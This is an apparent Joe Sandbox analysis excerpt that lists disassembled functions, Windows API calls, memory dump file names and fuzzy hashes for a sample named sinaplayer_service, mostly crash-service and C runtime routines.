                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?width@ios_base@std@@$?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@U?$char_traits@_W@std@@@std@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3148193194-0
                                                                                                                                                                                                    • Opcode ID: 7fca758e4faf8509908c592d76b9a2354a0a5b34695c49d4c767c8248535e68e
                                                                                                                                                                                                    • Instruction ID: e8b650dfaa687f67065216e79b6d4c4091b8cb8140b5f483859c390e726b5bd6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fca758e4faf8509908c592d76b9a2354a0a5b34695c49d4c767c8248535e68e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851B334A00505CFDB26CF68C9AAB6DBBB5FF49310F158569E81A9B3A2C739DC05CB50
                                                                                                                                                                                                    Function 00391880 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 178networkfileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000040,00000000), ref: 003918FE
                                                                                                                                                                                                    • wcstol.MSVCR120 ref: 00391917
                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 0039195F
                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,?,?), ref: 003919A1
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?), ref: 003919DA
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 003919E3
                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000,?,?), ref: 00391A11
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00391A2C
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00391A5F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00391A68
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00391EAE), ref: 00391AA9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00391AD9
                                                                                                                                                                                                      • Part of subcall function 003712F0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long), ref: 00371304
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$InternetQuery$AvailableD@std@@@std@@DataU?$char_traits@Unlock@?$basic_streambuf@$FileHttpInfoReadXlength_error@std@@wcstol
                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                    • API String ID: 1847547159-2766056989
                                                                                                                                                                                                    • Opcode ID: f4b46bf29274a0f2a65d2514f6051d1b15eec175f432fb4d5f2203ae299c0180
                                                                                                                                                                                                    • Instruction ID: 6545473bf10a11e71d8773e40333d78a3cb27b3bb4a31bc3c71b65361067e4a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4b46bf29274a0f2a65d2514f6051d1b15eec175f432fb4d5f2203ae299c0180
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45617A71D01219ABEF22DBA4CC45BDEBBB8BF05304F0541A9E809BB291DB755E48CF91
                                                                                                                                                                                                    Function 0038A970 Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 99windowregistryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 0038A9A6
                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 0038A9D4
                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,0039F3DC,crash service,00000000,80000000,80000000,00000000,00000000,00000000,00000000,0038B3C8,00000000), ref: 0038AA01
                                                                                                                                                                                                    • UpdateWindow.USER32(00000000), ref: 0038AA21
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038AA2E
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,0000007C,000000FF), ref: 0038AA4B
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?,00000000), ref: 0038AA74
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,00000000), ref: 0038AA8C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message@logging@@Window$??6?$basic_ostream@ClassCreateD@std@@@std@@Helper@logging@@LevelRegisterU?$char_traits@UpdateV01@Vlogmemset
                                                                                                                                                                                                    • String ID: 0$breakpad\tools\crash_service.cc$crash service$window handle is $Vll
                                                                                                                                                                                                    • API String ID: 3772590900-3434040220
                                                                                                                                                                                                    • Opcode ID: 0fd30b87db523852f2b0e8f01ae5b339f6bee1097fc940c4d63e73fd479d84d6
                                                                                                                                                                                                    • Instruction ID: 920799f63a483875dcb90d0a0b4d8b4af1450a2f6b73839858e31a6abc56e4e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0fd30b87db523852f2b0e8f01ae5b339f6bee1097fc940c4d63e73fd479d84d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F31E6B1944208EFDB22DFA8DC86BEEBBBCFB05354F10416AF815E2290D7755904CB90
                                                                                                                                                                                                    Function 0038E840 Relevance: 22.6, APIs: 15, Instructions: 126sleepsynchronizationpipeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,8285FFAB,?,?,00000000,00000000,00000000,0039BCE1,000000FF), ref: 0038E873
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0038E87E
                                                                                                                                                                                                    • DisconnectNamedPipe.KERNEL32(?), ref: 0038E887
                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0038E8A1
                                                                                                                                                                                                    • UnregisterWaitEx.KERNEL32(?,000000FF), ref: 0038E8B1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0038E8C5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000001), ref: 0038E8EF
                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0038E90C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0038E915
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0038E922
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0038E925
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E93E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E94F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E987
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E999
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$CloseCriticalHandleSection$DeleteDisconnectEnterLeaveMutexNamedPipeReleaseSleepUnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1882864531-0
                                                                                                                                                                                                    • Opcode ID: 51b1fa0c902c3061873927c30c29e8d153efd43d565a5144822ad93060d83c92
                                                                                                                                                                                                    • Instruction ID: a642769c503d3529b349e2d385f951f1694991ae6ec595c3013848534c7163b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51b1fa0c902c3061873927c30c29e8d153efd43d565a5144822ad93060d83c92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B841B1B1A00701AFDB12EF25CD85B29B7A8FF05710F0101A9E91997750DB75FC60CBA1
                                                                                                                                                                                                    Function 6C562F6E Relevance: 21.2, APIs: 14, Instructions: 189COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(?,00000000,00000000,?,7FFFFFFF,6C5630E8,00000020), ref: 6C562F98
                                                                                                                                                                                                      • Part of subcall function 6C562F50: _mbstowcs_s_l.MSVCR120(?,?,?,?,?,00000000), ref: 6C562F64
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(?,00000002), ref: 6C562FAD
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,00000000,?,?,00000000), ref: 6C562FCA
                                                                                                                                                                                                    • _wsetlocale.MSVCR120(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C562FDF
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _getptd.MSVCR120(6C5633E8,00000014,6C562FE4,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C5632D3
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _calloc_crt.MSVCR120(000000B8,00000001), ref: 6C5632F0
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _lock.MSVCR120(0000000C), ref: 6C563306
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: __copytlocinfo_nolock.LIBCMT ref: 6C563317
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: wcscmp.MSVCR120(00000000,6C62F880,00000000,00000000,00000000), ref: 6C563351
                                                                                                                                                                                                      • Part of subcall function 6C5632B8: _lock.MSVCR120(0000000C,00000000,00000000,00000000), ref: 6C563368
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C562FE8
                                                                                                                                                                                                      • Part of subcall function 6C55ECE0: HeapFree.KERNEL32(00000000,00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C55ECF4
                                                                                                                                                                                                    • _getptd.MSVCR120(00000000,00000000,00000000), ref: 6C562FFB
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000000,00000000,?,00000000,?,00000000), ref: 6C563022
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(-00000004,?,?,?,?,?,?,00000000), ref: 6C563039
                                                                                                                                                                                                      • Part of subcall function 6C562226: malloc.MSVCR120(6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C562237
                                                                                                                                                                                                    • _wcstombs_s_l.MSVCR120(00000000,00000004,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 6C563060
                                                                                                                                                                                                    • _lock.MSVCR120(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C563075
                                                                                                                                                                                                      • Part of subcall function 6C55EDD7: EnterCriticalSection.KERNEL32(?,?,6C5EE497,0000000E,6C5EE4F8,0000000C,6C55EC8C), ref: 6C55EDF3
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6C5630BA
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6C5B0092
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5B00B1
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5B00FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_lock$_calloc_crt_getptd_mbstowcs_s_wcstombs_s_l$CriticalEnterFreeHeapSection__copytlocinfo_nolock_invoke_watson_malloc_crt_mbstowcs_s_l_wsetlocalemallocwcscmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1259114276-0
                                                                                                                                                                                                    • Opcode ID: 0144612f13c6fecfa0d5ae03084a4d0a683aff6cc7b47b128d140d1b9fd004fc
                                                                                                                                                                                                    • Instruction ID: 1d55873c0953b2be8ee6954e7396beeb88f9cf274d4c315647fbfe977fb9e034
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0144612f13c6fecfa0d5ae03084a4d0a683aff6cc7b47b128d140d1b9fd004fc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E510971D05609DBDB208B66CD44BAF77B8AF85328F50451EE815F7E90DB34D8448BA0
                                                                                                                                                                                                    Function 6C574CD6 Relevance: 21.2, APIs: 14, Instructions: 176threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C574CDD
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000004,6C574EF7,00000000,?,00000000), ref: 6C574CFB
                                                                                                                                                                                                      • Part of subcall function 6C575C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6C574ACC,?,?,?,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C575C35
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D4C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D5B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D6A
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000005,00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D79
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000006,00000005,00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D88
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000006,00000005,00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D97
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000838), ref: 6C574E4D
                                                                                                                                                                                                      • Part of subcall function 6C55EE11: malloc.MSVCR120(?), ref: 6C55EE1A
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::HillClimbing.LIBCMT ref: 6C574E60
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120 ref: 6C574E68
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C574E85
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5A3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6C5A347D
                                                                                                                                                                                                      • Part of subcall function 6C5758DA: __EH_prolog3.LIBCMT ref: 6C5758E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@$ElementKey@2@@Policy@SchedulerValue@$H_prolog3HillThread$??0_??2@BlockingClimbingClimbing::Concurrency::details::Count@CriticalCurrentInitializeLock@details@NodePriorityProcessorReentrantSection__crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1717548414-0
                                                                                                                                                                                                    • Opcode ID: 2b68b2bfb9d5f555797408353eeca851caae4892e204e6382bcfa5d40cb1b181
                                                                                                                                                                                                    • Instruction ID: ea5d732184277d0311df3924f38b6005b7161d2c51b1c982fb655587a74ab736
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b68b2bfb9d5f555797408353eeca851caae4892e204e6382bcfa5d40cb1b181
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7261F9B1B00A02EFD708CF39C955799FBA5BB89314F14822AD469C7B50DB70A864CF90
                                                                                                                                                                                                    Function 6C56CCA8 Relevance: 21.2, APIs: 14, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$__cftof
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 813615167-0
                                                                                                                                                                                                    • Opcode ID: ec5ec4bffb35308e86cc2a6cb88d80579915c7e9d7c4bfa3c8eb3da6a391d514
                                                                                                                                                                                                    • Instruction ID: 8e1daea9e76b5a133630c65a4a6f614edbcbfe06baeae29969d70396d30071c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec5ec4bffb35308e86cc2a6cb88d80579915c7e9d7c4bfa3c8eb3da6a391d514
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22412A33400254DEC7249B7A9C909BF77A49FC6B38730074AE4709BEF0DB24D886C6A1
                                                                                                                                                                                                    Function 00389960 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 112COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 0038998B
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 003899A5
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,operation,00000009,0039D874,00000000), ref: 00389A13
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A4C
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,os_error,00000008), ref: 00389A85
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A9B
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,net_error), ref: 00389AD4
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389AE3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@DictionaryValue@base@@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@Integer@$??2@D@2@@std@@0@String@
                                                                                                                                                                                                    • String ID: net_error$operation$os_error
                                                                                                                                                                                                    • API String ID: 2157804929-3557930716
                                                                                                                                                                                                    • Opcode ID: 7e6405687717c0dba998136e62f48913f1647c3cd9635320a4f737058316f7c0
                                                                                                                                                                                                    • Instruction ID: 129440d15e686b28da4c18b3e4c5329b123c98ab6b7c6bc9c9c2057faf04ee17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e6405687717c0dba998136e62f48913f1647c3cd9635320a4f737058316f7c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C4189B1D04248EBEF12DFA4C809BEEBFB4EB05724F144169E4167B2C1D7B91A48CB91
                                                                                                                                                                                                    Function 00389967 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 110COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 0038998B
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 003899A5
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,operation,00000009,0039D874,00000000), ref: 00389A13
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A4C
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,os_error,00000008), ref: 00389A85
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A9B
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,net_error), ref: 00389AD4
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389AE3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
